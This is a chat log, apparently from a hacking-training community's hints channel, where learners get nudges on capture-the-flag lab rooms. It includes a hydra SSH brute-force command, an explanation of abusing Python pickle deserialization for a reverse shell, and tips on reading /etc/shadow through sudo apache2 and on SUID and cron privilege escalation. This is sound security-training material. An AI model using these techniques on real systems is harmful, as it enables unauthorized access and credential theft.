#room-hints

yup, that'd work I believe

you could use https://revshells.com to generate a payload instead of msfvenom, if that one doesn't work 😉

hey there!

please i need hint on Task 3, Ques 5 on the ReGex room

ive been stuck for hours😫

Look at the hint in parenthesis from the question below it 😉

hi, i'm working on networkservices 2
i have shell with root access, but don't know where to look for the flag? (checked ls -a, and found nothing)

Root flags are usually in /root

not able to cd to root directory

You said you have root

i think so

because i have followed till the previous step without any errors

!docs verify

Follow those steps, then you can post images

But if you cannot cd into root (if you're getting permission denied) then you're not root probably.

i have a bash file with permissions -rwsr-sr-x

and running it with bash -p

Verify with the bot and post a screenshot.

The owner on the file is wrong

Therefore you don't have a shell as root.

You are not root.

thank you, got it

completed the task, Thanks again James 🙂

Please help.. whats up with the first three dots in the answer format? its confusing!! and please give me a tips on the ques, regex can be intimidating😫

It's part of regex - this was the hint I gave someone else on the same question Look at the hint in parenthesis from the question below it @copper blade

Thanks man! I'm a noob😆 sorry, is the three leading period suppose to be part of my provided answer? are they some place holder or something??

Gave +1 Rep to @empty crest

No problem, I DM'ed you a sanity check @copper blade

Thanks man!👍

Happy hacking man!

You saved me tons of hours for the tips! Thanks man! finally got it!!

Gave +1 Rep to @empty crest

i'm in the eternal blue room and i can't figure out where the 2nd flag is. i'm having a hard time researching where windows stores passwords, kind of difficult to google

i've tried navigating the system and trying to make reasonable guesses, but the task also says the folder may be deleted, so i'm not even sure if what i'm looking for is there currently

mkfifo is difficult to understand

is it a pipe or a file?

Is a file similar to a pipe, read the content of the following link for a better understanding of the command https://linux.die.net/man/3/mkfifo

I am solving inferno and I m stuck.It has so many open ports.I tried enumeraion with port 80.I found a direcotry which is using http authentication.I looked for vhosting but no success.I diiferent wordlists for directory bruteforcing still no sucess.Can anyone give a nudge to get me started??https://tryhackme.com/room/inferno

If you find the directory that asks for magic words to let you pass...Hydra of Lerna can be your best friend to help you guess them...

alright that means more direcotry bruteforcing right

That's right

I mean, if you found a directory with basic HTTP authentication, Hydra of Lerna can help you with that directory, what usernames are often used by default?

@brave vale okkkii.I got it now.I thought you were indicating that there is another directory where we can pass magic words

Hi guys. Starting Point > Shield. Inside the walkthrough: "The combination admin :
P@s5w0rd! is successful and we gain administrative access to the site." Is this a common case for WP to have this password?

as a default password? probably unlikely

as a password set by a user, more likely I guess, permutations of the good 'ol password are more common than most 🤷

thanks alot brother

Gave +1 Rep to @storm venture

need a small help with the room vulnversity task 4 Try upload a few file types to the server, what common extension seems to be blocked? i quite dint understand i navigated to the part of the website and i get the option to upload payloads but i am not getting what the question is asking me to do ?

Which file extension usually web shells have..?

huh ......

got it thank you

Gave +1 Rep to @tight fulcrum

Network Services 2: Enumerating NFS — "request denied by server"when executing this command from /tmp/mount:

Hello Guys! Please could you help me with one task in linuxmodules room.
https://tryhackme.com/room/linuxmodules

TASK 7. SED. There is the question:
View the sed2 file in the directory. Try putting all alphabetical values together, to get the answer for this question.

Can anyone answer for this question ?

The share isn't called share.

Been working on Retro for a bit, I got initial foothold, identified how to do the priv esc and keep encountering an issue. After the first couple of hours I even went and checked a walk-through the recommend way around said issue is not working.

Anyone able to potentially assist?

Ok. Guys. So how to know when machines are related one to each other? ex. at the "Starting point": Pathfinder with Shield, etc.
"Using the credentials we obtained in a previous machine; sandra:Password1234! , we can
attempt to enumerate Active Directory."

most rooms on THM is just a single machine, or multiple machines that are not connected to each other. With the exception of networks such as Wreath or Throwback

and using a writeup isn't bad necessarily- just make notes of what you were missing, and try to learn more about that, so next time you have more knowledge and resources

Sorry. Posted to the wrong thread. My bad. Ment to be HTB

Network Services 2 room, exploiting nfs, my bash file has sr-x permissions until I ssh as user cappucino and then it has xr-x. What am I doing wrong?

screenshot it?

can you modify it after you transfer it?

no

is it possible you mounted and transferred it to a different dir?

I don’t think so, the file is there just the permissions are changed

different timestamps though

sorry, it's been a long day, my brain is kinda fried. I'm not super helpful at the moment. And I don't have my notes in front of me, so I'm kinda guessing.

I got the command to execute. Is this correct?

do a whoami

root

success! \o/

I got it. thanks

you're welcome 🙂 sorry I couldn't help much

It was just enough lol

just out of curiosity, what was the missing piece?

had to go into /tmp/mount/cappucino and change properties and then ssh in

i thought you had already done that?

I did it from /downloads and then copied it to cappuccino

ah

I was able to progress in the That's The Ticket room, to clarify, ||the firewall on the server sets restrictions on outgoing HTTP requests but being able to exfiltrate data through DNS lookups||, right?

anyone online here?

Ask your question directly.

so, the insecure deserialization task asked me to use the script to generate a encoded string and put that string in the cookie's value

how does the script work, and how does it cause any vulnerability to allow use to remote execute on it

The script doesn't cause a vulnerability

for now, I understand that changing the encoded value of the cookies allow us to exploit the web through decoding process<-deserialization

The script creates a payload that exploits a vulnerability

Well, creates an exploit that delivers a payload to exploit the vulnerability

well, all that script does is created an encoded string

Yep. That's your exploit.

and i pasted it on the cookies

and suddenly my netcat is in the system

so what does the string contain that make it so powerful?

Look at the code, it contains the serialised representation of that object

https://davidhamann.de/2020/04/05/exploiting-python-pickle/

thanks, will look into that

Gave +1 Rep to @stuck fractal

much appreciated

So by implementing reduce in a class which instances we are going to pickle, we can give the pickling process a callable plus some arguments to run. While intended for reconstructing objects, we can abuse this for getting our own reverse shell code executed.

oh i get it now

looking for some help on buffer overflow 1 if anyone is around

nmap -A -p- -vv scans do take forever dont they

For Business Purposes, the pivot, going for the slide show in msf, already did the bash shell, couldn't really privesc, tunnel?

just a little nudge, very little, lol

sort of has nothing to pivot from,

on the FurtherNmap box, when you do the ftp-anon script against the box, is it suppose to be able to list the directories?

I don't recall that box in detail, but if it's scanning for anonymous ftp login, then yes, I would think so

nmap can log in to ftp without credentials, and then list the contents

yeah it would login but then just timeout

yes they do. Many people have suggested to me RustScan, a utility that does speedy port scans

there are also ways to speed up nmap

like not doing -A to start

on the Simple CTF practice room the first question is "How many services are running under port 1000?"

is there a way to show more services with nmap?

did you only scan that single port?

for that question yeah

I think what it is asking is for ports 0 through 1000

oo

you are correct. thanks!

you're welcome 🙂

Hello guys!

I need help please
I'm almost done with the NMAP room and on the practical section, I was told to do an ICMP scan on the host, which I did and got a response that the host is up but on picking the answer as "yes", I got it wrong from the ques......

My ques is, if a host respond to ICMP scan, will NMAP show "host up"?

Is it asking for "yes" or some version of it, such as "yay" or "yea"? Should say just before where you put the answer. That threw me on some questions

All I saw was Y/N

Maybe it only needs a Y and not a Yes unless you put in No and it said that was correct

Actually, I entered just only Y as it obviously denotes Yes but got it wrong but marked it correctly when I entered N

I was wondering maybe the answer was set with a different IP or perhaps, I still don't understand NMAP response with ICMP scan😩

If you're using the attackbox, the target treats the traffic a little differently

The target sees it as more trusted because of something called a Zoned firewall

Thanks for the clarification, I used the attackbox

Gave +1 Rep to @stuck fractal

Zoned firewall?

Let me research on that:sweat_smile:

tl;dr traffic from different places is treated differently.
The "zones" are the places traffic comes from.

Hi guys,
I'm a bit stuck on:
OWASP Top 10 tools -> [Severity 9] Components With Known Vulnerabilities - Lab
-I found CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting - exploit on exploit-db
-Am I on the right track or need to look for other ways to execute a shell command?
thanks in advance for the reply 🙂

nevermind,I finished it

hey can someone give me a hint on OWASP top 10 -> security misconfiguration ?

like what service's default password should I look for?

OWASP is web vulnerabilities.

the second screenshot you posted has some of the information you need

What thing related to sssh could allow you to login to a machine without knowing the username and pass?

the key file?

No

Its a question in THM?

what room?

You wanna check it out?

it'll help me to be able to see what you're trying to do

which task?

Task 5

Ever since I have been using ssh haven't come across such question

So tricky

read the bullet points in task 5

Yes I have tried that before

it's one of the words in the bullets. This is room-hints, so I'm trying to not just give you the answer 🙂

Yes yes I have got it

Thanks bro

🙂 you're welcome

I'd need more info/context to be able to help

It's not

But you only get the banner the first time you connect.

Listen to what I just said. Take a moment to understand it.

Gave +1 Rep to @worn otter

I was forgotten by the bot though

+rep @stuck fractal

Gave +1 Rep to @stuck fractal

James, you're slacking. You've dropped below the next 3 people combined

One more rep and I'll pass Muiri. Then I can retire.

Hey guys. Can anyone please point me in the right direction here? Im busy with Linux Fundamentals Part 3 > Task 8. I need to locate the IP address of the user who visited the site. However I cannot access the log as a get permission denied.

https://tryhackme.com/room/linuxfundamentalspart3

Did you check the other file?

Yeah. I ended up using ls -l to view permissions and was able to view the log necessary

Thanks for the help 🙂

Good you didn't give up.
Kudos man

in the room "Break Out The Cage" i am unable to read the "key" from the music mp3

i can see it, but i can not understand it :p

(ps im not a bot)

A bot would say that 😆

can someone help me i am stuck at linux fundamentals part 3 :

Locate the process that is running on the deployed instance (MACHINE_IP). What flag is given?

Whenever i do ps aux, it lists out the processes but i am unable to find the flag

the flag is in the file task3, try: nano task3

no no, i have cleared that question i am talking a question that belongs to Processes 101 section

If you are seeing MACHINE_IP then you have not deployed the machine

i have deployed it..

No. You might have deployed the attackbox, but you have not deployed the target machine.

yes i mean i have ran the command sudo openvpn something.ovpn

in my downloads folder

brother can u please say me what are you exactly saying as i am new to tryhackme

there is a chatroom for that one

#852988336296820796

but u can also dm me

There are multiple machines involved. You need to click the button in the tasks to start the target machine. You've probably only started the attackbox.

yeah i got that, you are right i forgot to start the machine, i only started the attackbox

hey y'all, I know the django room has write ups but I'm struggling with the first flag because I can't see the site; I added my machine's IP to the allowed_hosts, but whenever I try to access it on firefox it says firefox can't connect

anyone had issues with that? to clarify, I added my own machine (attack box)'s IP to the allowed_hosts and in firefox, I type in the CTF machine's IP (with :8000)

Hey, I'm in the 'Basic Pentesting' room, and it hints to use Hydra to crack the 'Jan' user's password (which is apparently super weak). I'm using the rockyou wordlist because fasttrack didn't find it, but Hydra is telling me I have (at most) 980 HOURS to wait for the results. Wondering if I'm missing something obvious. I'm doing this over ssh btw

Specifically:

hydra -l Jan -P /usr/share/wordlists/rockyou.txt -s 22 10.10.225.145 ssh

question in the Osquery room am I suppose to see the information from Polylogyx osq-ext-bin extension, in the Kolide Fleet web gui or is that only avail in the cli

Had a deeper look, think I've found (much) better wordlists for this, so I'll give 'em a whirl

your syntax dont look right

Can you explain what is wrong please? The command seems to run fine

should look something like hydra -l jan -P /usr/share/rockyou.txt ssh://10.10.225.145

It looks to be equivalent, the log outputs this:

attacking ssh://10.10.225.145:22/

from hydra's docs Example: hydra -l user -P passlist.txt ssh://192.168.0.1

if it works then roll with it It just looked different to me

👍

No worries, thanks for checking anyway!

Yeah, there's a couple of different syntax for the same thing. I've used your way and the other way previously

Just because it says 900 hours doesn't mean it will take anywhere near that. If you're told to use rockyou (hint: you should use rockyou) then use rockyou.

Thanks, I took a stab at just leaving it and it eventually worked, patience wins! 😄

https://tryhackme.com/room/kenobi
Hi, I need some brains into this ProFTPd things near last question, mounting doesnt show up anything, double checked the steps (copying, mounting) but still can't find the rsa key, thx anyway (ping me when u help)

@night zephyr When you're asking for help, you should provide information like what stage you're at, what you've tried, that sort of thing

Task 3, I've tried what the guide say

just cant find the rsa key

the only thing different from the screeenshot is "mount: /mnt/kenobiNFS: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program."

Well there's your problem

Google that error and find how to fix it

Room Linux Modules , Task 7 Last Question . what is exactly mean ? What did she sed?(In double quotes) https://tryhackme.com/room/linuxmodules

Web Fundementals Task 5 -- ||Mini CTF: There's a web server running on [Attack Machine IP]. Connect to it and get the flags!|| am I supposed to directly connect with just HTTP requests or should I use my previous knowledge (from earlier Complete Beginner courses) to connect to the server first?

I tried sending a curl command to the IP and output the file, but I'm not sure I'm looking at the right thing.

If I remember that one correctly, there's a set of urls to request

like a path? It says "make a GET request with path /xxx/xxx

using curl, though you`ll need to be connected to the vpn if you aren't using the attackbox

I am using the attackbox

thank you for answering my questions

It's definitely not the "attack machine ip"

then just startup the target vm by hitting the big green button if you haven`t already done so

You can use CURL or the browser.

Usually both

and yeah it's not the attack machine ip that you need to hit

looks like it matches with the one up top though?

eh?

active machine, not attack machine sortry

ah

should be the one you started in the task

yup

it'll give you an ip address

there's a port given in the task

yep IO

and a path

I'm looking at that

there's no SSH or other trickery, it's just a web server

for the first one you can use your browser

okay

well, the browser in the attackbox I mean

yep found GET

thank you very much, I'll try to work it out from here and come back if I have any other questions

the rest can be done with curl, or the browser dev tools easily enough 🙂

thank you!

thank you 🙂

Gave +1 Rep to @ripe hedge

I'd try with both to get the practice in

good idea

Do you have a nice way to make a POST from the devtools?

cURL's syntax can get a bit awkward...here's a cheat sheet https://devhints.io/curl

nice, no

but you can edit and resend a request with firefox, and change the method there

haven't figured out how to do that with Chrome's devtools though

I am solving willow.I have found the public and private key pair.A bit stuck here.Am I supposed to crack the rsa encryption using them?Any hints would be appreciated.https://tryhackme.com/room/willow

Yeah I believe so. Do you have a message to decrypt?

naviagting to port 80 found this.

Ok, so follow your instinct here

I tried to crack it with a few online rsa decypters but no success yet.

wil try harder

Something that's driving me crazy, I can't figure out what's going on with this syntax:
https://cdn.discordapp.com/attachments/522158539129618453/854027860481409035/unknown.png

Why is the binpath written that way and not "C:\PrivEsc\reverse.exe\ " I really want to understand what's happening there, and if there is any difference, though both seem to work

I believe the first \ and last \ are escape characters so the command doesnt the see the " that follows it as the partner to the " that precedes it. This might shed some light. https://newbedev.com/when-creating-a-service-with-sc-exe-how-to-pass-in-context-parameters

@vital crown Thank you so much!

Gave +1 Rep to @vital crown

AHHHHHH

I get it!

So that it actually gets written into the path as a string with "string" rather than just raw which has that issue with spaces in windows right??

Like so you don't have that bug where C:\file\file with space will possibily execute C:\file\file.exe?

God that was driving me crazy, I couldn't find anywhere explaining windows command line syntax when it comes to escaping strings

Yeah, that's my take on it

Thank you so much! I don't know why, but it was bothering me so much that I couldn't figure out why it worked

Room: https://tryhackme.com/room/googledorking
Task: 2 (question 1)
Name the key term of what a "crawler" is supposed to do. Tried ||crawl, visit, scrape||, etc. Hints?

robot.txt?

5 letters

I believe it's actually in the paragraph above

one would think so. But nothing I've tried works ||search, rank, etc||

Am I just a knucklehead overlooking something obvious? (probably)

It's both a noun and a verb. The verb describes the process of creating the noun.

I realise that's a little abstract

🤔

not score/s

Right sort of idea, wrong word

hm. already tried rank/s

Stuck in Osquery room Task 9 question 2 only one left to complete the room can anybody tell me the table i need to query for the other agent installed

I haven't done that room, sorry

Right lines still

It's not very used in the text

The process of crawling allows the search engine to form a(n) .....

first letter?

i

🤔 this is gonna slap me in the face when I finally see it

It's also a database term

Used to accelerate searches

that gave it away

a slap in the face has one item with the same name

Thank you. I still feel like an idiot, but LESS like an idiot. That one isn't super obvious.

Gave +1 Rep to @stuck fractal

Yeah I agree. I don't like the way the question is worded

I actually think I tested that room, so that's on me

I'd say you're fired, but since you work for free.... 🤷‍♂️

hey how to give rep

Room: https://tryhackme.com/room/bufferoverflowprep
Task: running of exploit
Query- I created shellcode using msfvenom but I am getting error when I concatenate the payload in buffer; I getting TypeError: can only concatenate str (not "bytes") to str. When I try to perform casting the payload doesnt work. I am using python3. Any idea whats going wrong

One of these

As an extra clue, the program has already been mentioned in the text early on 😀

.
Burp Suite, Task 8, Question 8
The current hosted version of Burp Suite does not have the Customer Feedback option, I would "just skip to the next question" as instructed, but I am trying to complete the pentest+ path and thus need 100% on this room. Everything else is done so far, just am unable to answer this question.

What field do we have to modify in order to submit a zero-star review?

This sounds more like the OWASP Juice Shop room ?

Looking for a hint on the new Mustacchio room, don't want to check the room discord itself as I think there will be spoilers. Found the admin page, this is going to be some kind of XXE vulnerabiltiy, right? I know sod-all about XEE, so am floundering a bit. Hapy to put in the time to learn, but a hint that I'm in the right area will be appreciated, I don't want to waste a load of time learning somethng that isn't the right path

need hint for Investigating Windows 3.x question 13 What is the parent PID for the above process process explores shows the wrong answer where should i be looking

Correct

Check the saved logs.

How well websites work - task 5: "View the website on this task and inject HTML so that a malicious link to http://hacker.com is shown." I dont get any feedback after injecting the code, where do you look for the flag?

it should be in the repeater

I can do the http injection fine but I cant find the flag anywhere

after you get the link to display, it should also show you the flag

are you supposed to change the button?

no not the button

you see how I changed the input to a hyperlink? is that not what it wants you to do?

perhaps it's the text of the link that is preventing the flag from getting triggered

it's just asking for that url

is it a pop up?

like would adblock block it?

nope, just a regular link

not opening the page, just displaying a link

got it

in the basicpentestingjt room, for the last question, i wasn't able to figure out how to crack the second password, however i was able to acquire by finding a way to read a certain file that i shouldn't have been able to read (not /etc/shadow, the other one). i'm curious if there's something i didn't think of in attempting to crack the passphrase

For the last password you need to get into the other user of the machine. You need to get his file, crack the password of it and connect as him to read password file in his directory.

after starting a net cat listener, whenever i type anything it ends the listener

this is OWASP top 10 task 26

guys

has anyone completed syshacw1

i found the web flag
but i did so many scans i found nothing
[
only wp-admin
[
login.php

nikto etc but no results

could anyone help to being able to help me

i need a hint

for user flag

ohh, i think i skipped a step then. i was able to read the contents of the pass.bak file as the first user by using one of the SUID bins

The content of pass.bak is the answer 😄

right lol i know that. i guess i'm not sure what password i was meant to be cracking if not the one in pass.bak

i got the second user's hash out of /etc/shadow, but i was unable to crack it, but i was able to get his password from the pass.bak file

did you check the hidden directory in his home folder?

hm i can't remember. i'll take another look later. i was able to finish the room, but i did feel like i had done it wrong haha

in short: he has a key to login also known as.. id_rsa

right, got it. that makes sense. i guess i sort of bypassed needing his key lol

i am doing jack of all trades room and have got a shell

muiriland you here?

i got the password file but what to do with that

Network Services 2: Enumerating NFS — when trying to run "sudo mount -t nfs IP:share /tmp/mount/ -nolock," I get ||"mount: /tmp/mount: unknown filesystem type '-nfs'.||

Screenshot

nfs-common is installed on my machine

Am I in the wrong directory?

well same happens in /tmmp/mount

The command you're running and the command you posted are different

-nfs vs nfs

OH.

hahaha

thank you

Gave +1 Rep to @stuck fractal

whaddya know, that worked

my first recommendation, if something isn't working, is to check what you typed.

i thought i did hahaha

Especially when the error message points you to the exact section

ty

Room lfp3, the crontab keyword is not the answer?

You need to check the users crontab ( crontab -l )

I only see one job.

Now you need to find the keyword

I forgot the @ 😅 thx

Osquery Task 9 - What is the schema for win_event_log_data?
changed from when I last did

CREATE TABLE win_log_data('time' BIGINT, 'datetime' TEXT, 'source' TEXT, 'provider'

Microsoft-Windows-Sysmon/Operational changed also

hi guys, i'm still newbie and need your help. I stuck on question for "what the shell" at linux practice box? would you help me with the tutorial? appreciate for your help.

Please ask your question directly

I am solving bookstore and I found ||/console|| directory under wezberug webserver.Managed to bypass the authentication for pin by intercepting it and got access to console.But I cant run code in the interpreter.I m kinda stuck here any help would be apreciated.https://tryhackme.com/room/bookstoreoc

so i want to run a list of number on that selected thing like in simple terms a number list attack can anyone tell me how can i room owsap task 18 question 3

please do help me out thanks in advance

under payload select numbers

Physical Security Intro - Task 6 - Lock picking isn't my thing but both YT vidz don't show the answer for Adams Rite hardware fixtures are susceptible to a bypass where a wire is snaked through the keyway and actuates the locking mechanism behind it, what could prevent this bypass? any direction? Thx

Please someone help!

I'm faced with a challenge to Port scan all the ports in a network, for almost an hour, no result I'm just stocked without any result from NMAP..

Please any clue on how to fasten the portscan up:weary: :weary:

what is the command you are running?

-p- --min-rate=3000
This should help

-A -p-

Thanks man, I will give this a try😋

Gave +1 Rep to @tough rapids

let me know if u still face issue ||its my alt account||

You are amazing man..
Took only 210seconds to scan all the ports...

Thanks man!

Gave +1 Rep to @dapper sentinel

🙂

glad to hear that

But why is it taking more than an hour to scan before??

Because you use -A and -p-

yeah it takes time to run each and every port

I still use that again💩

bad idea

So the flag you specified reduce the time right?

Why?🥺

it fastens the scan afaik

kind yes

Check what nmap does if you use -A

Yeah I checked it.
Can you expantiate?

Thanks man

crazy ^_^

With -p- you're scanning all of the 65535 which is fine depending on the task.
But what makes it worse is -A.
Since you enable OS detection, version detection, script scanning and traceroute.
Imagine this on 65535 ports. This adds up pretty quick and that's why you scan is that long

generally speaking.. you don't use -A

Oh..
Now I understand your point.
Actually I know what both flags will do but since emphasis is being laid on using -p- and -A in the room, I was wondering maybe a ques will be asked based on the scan results later on..

Anyways, thanks man!

Gave +1 Rep to @tight fulcrum

you'd normally do a fast -p- scan to see what's open, then go more in depths on only the open ports

I am solving bookstore.Registered ana ccount and looged in to application it talks about ||rce or lfi|| but could nt find any parameters for it ?Any help ?https://tryhackme.com/room/safezone

got it man thanks alot

Gave +1 Rep to @true widget

Me again: Soz. going in circles on this one.

stop for a bit and think it through. You need to understand the syntax of the command, there's no point in trying things without understanding what you are doing - even if it works, you will not have learned much. Which room is it ?

you mentioned being tired on another channel. Breaks are good, again learning gets harder when tired

looks to me like you might be missing a / and a space in that command. Read it very carefully, along with the example command given

precision is super important here (and in most of hacking)

If you seacrh the history in this room it looks like you need to break out of the docker instance into the host?

wrong room...

You have a little error in your last command.. Break the command down into pieces and understand it..
It's not as complex as you thought:slight_smile:

Hello guys....

I noticed whenever I connect to a remote network either by smb, ftp, ssh or mounting with nfs, sometimes the command delays alot. For instance to "ls" in a directory might take up to like 5minutes or more sometimes to respond but I noticed if I use the attackbox with the web based Kali Linux, it works perfectly...

Please someone help, maybe I'm having an error in my settings or something:weary: :weary:

Any hints for python playground?

Hi, has anyone had an issues to install kerbrute tool for AD spooky room ?

i followed the instructions but it doesn't work

johntheripper room has this question:

What is the cracked value of this password?

i can't understand this question, can someone help

of what password are they mentioning?

Check the files provided in the task. You have to use john in order to crack this hash

Blue button (Download Task Files).

got it

thanks guys

Hi there, to me that would indicate a potential network issue on your side or potentially an issue with the VPN.

!vpnscript

Try this first ^^

Most probably not network issues as I use the same network to access the attackbox and it works perfectly🤷

Thanks man, will try it out!

Gave +1 Rep to @mystic flume

Hope it helps! @copper blade

i feel dumb, but in the steelmountain room i can't figure out how to replace the misconfigured file with my payload. i don't seem to be able to move the file into the directory, and i tried doing cat ASCService.exe > C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe but that didn't work either

Are you sure that this is the correct way of writing a path with spaces?

i did use quotes, just messed up pasting info here. i think i'm supposed to be using "Write-ServiceBinary" in powershell now that i'm looking at the output of PowerUp.ps1 more closely, but i don't really know what's going on. i did Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path C:\Users\bill\Desktop\ASCService.exe and then i assume i have to leave powershell to restart the service (and i assume i have to stop the service first because if i try to use the command the room tells me to, windows tells me the service is already running)

but that doesn't seem to do anything when i restart it

or you use copy ASCService.exe <your path> @past canopy

thanks @tight fulcrum, i'll keep that in mind. i'm still not seeing anything happen when i restart the service though

Gave +1 Rep to @tight fulcrum

maybe my payload is bad

You can use the payload which is in the screen of the task

Make sure you*re using a listener before running the service

yeah, there must have been something wrong with the payload i generated. i just got the shell. thanks again

Hey! Can anyone give me a nudge to priv esc in overpass room1 ??

I have got the crontab file but don't know what to do next

Its running a script, try to intercept/overwrite that

@orchid root

Umm! Yes I saw that! It is piping the script in bash

But how can I overwrite it?? It downloding it from overpass.thm

It's also grabbing it from a remote address if memory serves

There are ways to abuse that

.thm isn't a real TLD

Umm you mean I can edit that buildscipt.sh??

Okay let me see

Probably not locally

Nah! But it is just passing the downloaded file in bash!
Do I have to do something path manipulation or something like this??

Its downloading a file, but from where, exactly?

If you want more help I'll be glad to help in #room-help

Overpass.thm/downlaods/src/buildscript.sh

Ook coming

How does it know what overpass.thm is? Domains are for people, not computers.
Computers need IPs. There's a hint.

Yes! I completed that room now

is it possible for Hydra to take more than 40 minutes in the room machine ?

You're probably doing something wrong

I started new one

also no result

16 tries per minute is way too slow.

how to increase it?

I haven't done that room

I haven't done the room

Just to give you an extra info 🙂 , and thx

Gave +1 Rep to @stuck fractal

There's no point spoiling the box for no reason

I don't mean it, Sorry

Hi!

hello guys, i am doing the room "Linux PrivEsc", my box has some commands that requires no root password. One of which is apache2. Can anyone give me a hint for running this program with sudo to gain root privileges without a shell escape sequence.

with apache2 as nopasswd you can't get a shell or edit system files

but you can read files like /etc/shadow

you just have to find out how...if you still can't am dropping this spoiler || sudo (path to apache2) -f filename||

thanks for nudging me in right direction, i will surely find out the answer by myself.

Gave +1 Rep to @rigid smelt

Hi, im doing the room for upload vulnerabilities. Currently stuck on task bypassing client side filtering. I did filter the request using burpsuite but nothing comes out when i press do intercept - response to this request - forward as instructed in the manual. What did i do wrong?

Anything clearly wrong here?

are you sure that "The" will only appear if the login fails ?

or passes... I'd look into the format too, although I might be leading you astray here. If you're sure about that bit, ignore me. I don't find anything else odd though

I m doing CTF collection and stuck at challenge 12 any hints?

Yes!

.

I ended up getting it 🙂

need a little help w Network Services room task 4 question 4

im looking trhru the output for both nmap and enum4linux and i cant seem to find the answer , any help?

i logged in using the smbclient too and am looking at the files i think...

There's a file with the name in it

You'll need to use a command to download that file

So you can read it on your machine

thank you

so do i use a command inside the smbclient?

yea

ok so i downloaded the file using get now where did it download to? this seems like it should be easier for me to do... is it that im just unfamiliar w smbclient?

Yup. It will be in the directory where you started smbclient

Might be late but I have never been a fan of using hydra. Give zap a try :)

Looking back, I could have done this one with just wpscan. But I need to use Zap more! thanks

Gave +1 Rep to @ashen scaffold

wpscan is always an option with wordpress :). Glad you got it!

can i get a hint on the owasp top 10 room

on task 16 im looking for the path to where the user's SSH key is located

im probably really dumb on this one but i have no idea 😭

i got it :P you have to include a whole file path not just directory

I am in the Wifi Hacking 101 room stuck on a couple of questions: Q1. What tool from the aircrack-ng suite is used to set the channel? Q2. And how do you tell it to capture packets to a file?

u need to do some research

like they said

We'll want to use aircrack-ng, airodump-ng and airmon-ng to attack WPA networks.

may be one of these?

@dapper sentinel Got it! Thanks!👍

ok cool

Linux Fundamentals 3 - Task 4 - I am trying to understand one thing. I have initiated Python 3's "HTTPServer" module to start a web server in the home directory of the "tryhackme" on the deployed machine. After providing this command --> python3 -m http.server -- the terminal is not giving any prompt to write the next command. In this case should i start over with a new terminal not closing down my terminal where i have initiated the web server?

tryhackme@linux3:~$ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

After the last line the next promt tryhackme@linux3:~$ is not coming

Should I have to open a new terminal to do the next set of activities, in that case can i close the previous terminal or i will have to keep it open since i have initiated a web server from it?

Your terminal where you started the http.server has to run. Just open a new terminal and wget the file.

okay, so do i need to again ssh from the new terminal to the deployed machine and then wget

No you don't need it

Your python server is already running. You just have to download the file from the target ip

okayy. Thanks a lot

Gave +1 Rep to @tight fulcrum

I need some more help. One thing which I am still not getting is the second terminal which I have opened is showing username@machinename as root@ip-of my attack box and not the deployed machine as in the case of the previous terminal where the prompt was tryhackme@linux3:~$. And the question is asking me to ensure that I am connected to the deployed instance

That's the information of the attackbox not the deployed machine ( your target). You don't need to ssh into the target to download files if you started a HTTP server there.

OK can someone tell me why the steel mountain task 4 exploit without metasploit is not working? I have downloaded nc started python webserver on port 81 as 80 is already in use on the attackbox and changed the python script. I see it connecting to the webserver but it does not start the nc.exe

Have you left Netcat in the Attackbox listening? also remember that the target machine has Windows as operating system, you need to download Netcat for Windows in the AttackBox (here you can find a copy https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe), and remember to rename the file to nc.exe.

There was a link in the task but will check that thanks

And read the description in the script, you need to run it two or three times to receive the connection in the AttackBox.

Yes ran it 10+ times

Thanks all will give it another try

Check the listening port you have configured in the script, if it matches the one you have left listening to Netcat in the AttackBox. Remember that the script tries to connect to port 80 of your AttackBox to download Netcat, you need to modify a part of the value of a variable to connect in your case to port 81 (I don't remember the name of the variable, I think it was vbs).

I see the get comming one line was changed to add the port 81

Hello all I´m new here...

I was doing the network services room, on task 3 last question we are requested to perfom a

enum4linux -A {ip_address}

We have a huge information page with mainly *unknown**unknown*
The question is what share sticks out as something we might want to investigate?
I have no idea, i have tried a bit but i am unsure what "share" mean, any hints ?

@dreamy pilot - Are you able to take a screenshot please? I might be able to point you in the right direction.

screenshot might be hard since it would take 10 screenie to copy the whole command 😅
The occurrence of "share" would be on the following screen
I managed to found the answer through multiple tries but i don't understand so it does not feel like accomplished.

"share" is a folder on a system that is made available over a network to other systems.

share is a conventional name to accessible folder over network or is it only for in this room?

these should be SMB1 folders

A conventional name for it. Didn't the room explain it? Can't remember the room too well

There is no mention of name convention. They kinda explain about share drive i just didn't though they would be name Sharename in the scan, thank you for the hint

No problems

in the room M4tr1x: Exit Denied question :What is the admin's ACP pin? I did find a ACP pin but is not accepting as a correct answer.... can you help me?

I successfully logged in as admin in the owasp juice shop room (https://tryhackme.com/room/owaspjuiceshop), got the flag, used the button to copy it, and the page is telling me my answer is wrong, what gives?

nvm i was putting it into the wrong field

i'm stupid, it's just @reboot

why would they make it seem like it's restricted to m, h, dom, mon, and dow when you can put things like @reboot

www.tryhackme.com/jr/missiononebytinas challenge unlocks the 30th

hi everyone i doing top 10 OWASP room but in task 5 i cannot understoood the question what user is using this app? please help me anyone

That question means: what user you are? Are you any specific user like root or not.

Hi any idea why i cannot connect to a nc listener on attackbox from a room server?

when I do this from metasploit it works fine so I connected that way and checked from the console why it does not run

Even when just typing nc.exe attack ip and port it does not arrive at the attackbox

ping does

OK powershell oneliner does not work neither

So IP must be wrong or something is blocking on the attachbox

ok there must be something blocking i stopped the webserver and used that port for netcat listener and ran it manually using the meterpreter shell

No suc6

Hi, can I check on the Room OWASP Juice Shop, Task 4, Question 1 : Brute force the Administrator account password.

does anyone know how long the Burp Intruder Brute force going to take?

Any helps for nahamstore?

Not finding any writeups which can help...

task question number?

1

task 3 q 1

I am not getting what to do...

well have u done his course?

No

I haven't

But i have done different courses covering web stuff

Something got deleted?

wait

@dapper sentinel ?

why is the link getting

deleted

?

2 Crazy man?

Idk maybe

You can just type it without https

Maybe i will get it

yeah thats my alt

Ooo

its just a write up

I see

Its getting removed

IDK why

ok let it be

Hmm

may be we cant share here

What do we have to do?

I have found some subdomains

ah

But what next

One shows forbidden and another redirects

@tough rapids ?

oh i`m not sure what to do at this point

I see

wait

no

That writeup just shows answers

like have u curled the page?

No

there is a walkthrough options

Means?

There is one option

But see, it doesn't teach anything

there u can find how did he got the flag

teach?

Kind of

